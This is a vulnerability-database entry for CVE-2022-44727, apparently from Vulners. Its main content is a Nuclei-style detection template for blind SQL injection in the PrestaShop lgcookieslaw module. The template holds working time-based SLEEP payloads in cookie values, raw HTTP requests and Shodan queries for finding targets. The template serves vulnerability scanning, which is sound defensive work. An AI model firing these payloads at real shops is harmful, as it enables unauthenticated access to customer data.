| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| CVE-2022-44727 | 13 Nov 202205:49 | – | circl | |
| PrestaShop SQL注入漏洞 | 10 Nov 202200:00 | – | cnnvd | |
| CVE-2022-44727 | 10 Nov 202200:00 | – | cve | |
| CVE-2022-44727 | 10 Nov 202200:00 | – | cvelist | |
| EUVD-2022-47661 | 3 Oct 202520:07 | – | euvd | |
| CVE-2022-44727 | 10 Nov 202217:15 | – | nvd | |
| CVE-2022-44727 | 10 Nov 202217:15 | – | osv | |
| Sql injection | 10 Nov 202217:15 | – | prion | |
| PT-2022-27286 · Prestashop · Eu Cookie Law Gdpr | 10 Nov 202200:00 | – | ptsecurity | |
| CVE-2022-44727 | 23 May 202500:15 | – | redhatcve |
id: CVE-2022-44727
info:
name: PrestaShop lgcookieslaw - SQL Injection
author: mastercho
severity: critical
description: |
The EU Cookie Law GDPR (Banner + Blocker) PrestaShop module before 2.1.3 allows blind SQL injection via the __lglaw or lgcookieslaw cookie used to store user consent choices.
impact: |
Successful exploitation allows unauthenticated attackers to read or modify the shop database, including customer PII and payment-related data.
remediation: |
Upgrade the lgcookieslaw module to version 2.1.3 or later.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2022-44727
- https://security.friendsofpresta.org/modules/2022/11/06/lgcookieslaw.html
- https://web.archive.org/web/2/https://securityandstuff.com/posts/cve-2022-44727/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-44727
epss-score: 0.02397
epss-percentile: 0.81984
cwe-id: CWE-89
metadata:
verified: true
max-request: 3
vendor: lineagrafica
product: eu_cookie_law_gdpr
framework: prestashop
shodan-query:
- http.component:"Prestashop"
- http.component:"prestashop"
tags: cve,cve2022,prestashop,prestashop-module,sqli,time-based-sqli,lgcookieslaw,unauth
variables:
rand_num: "{{rand_int(1000,9999)}}"
lglaw_v1: "2,3,4,5) AND (SELECT {{rand_num}} FROM (SELECT(SLEEP(10)))vkBH) AND (9297=9297"
lglaw_v2_json: "{\"lgcookieslaw_accepted_purposes\":\"[\\\"1\\\",\\\"2\\\",\\\"3\\\",\\\"4\\\",\\\"5) AND (SELECT {{rand_num}} FROM (SELECT(SLEEP(10)))vkBH) AND (9297=9297\\\"]\"}"
lglaw_v2: "{{base64(lglaw_v2_json)}}"
flow: http(1) && http(2)
http:
- raw:
- |
GET /modules/lgcookieslaw/views/css/front.css HTTP/1.1
Host: {{Hostname}}
- |
GET /modules/lgcookieslaw/views/js/front.js HTTP/1.1
Host: {{Hostname}}
stop-at-first-match: true
host-redirects: true
max-redirects: 3
matchers:
- type: dsl
dsl:
- status_code == 200
- contains(tolower(body), 'lgcookieslaw')
condition: and
internal: true
- raw:
- |
@timeout: 20s
GET / HTTP/1.1
Host: {{Hostname}}
X-Requested-With: XMLHttpRequest
Referer: {{RootURL}}
Cookie: __lglaw={{lglaw_v1}}
- |
@timeout: 20s
GET / HTTP/1.1
Host: {{Hostname}}
X-Requested-With: XMLHttpRequest
Referer: {{RootURL}}
Cookie: lgcookieslaw={{lglaw_v2}}
stop-at-first-match: true
host-redirects: true
max-redirects: 3
matchers:
- type: dsl
name: lglaw-v1-sqli
dsl:
- duration_1 >= 10
- status_code_1 == 200
condition: and
- type: dsl
name: lglaw-v2-sqli
dsl:
- duration_2 >= 10
- status_code_2 == 200
condition: and
# digest: 4a0a0047304502207aa8c3bad45d3765e82589fb4f7109dce1f8b83e0e10f87dc4631cfe0003fe5a0221008554cbfadb94b77aac5b9afbbcc2bd1153b5c2b5ae257b4d5fbe325b44852ad8:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation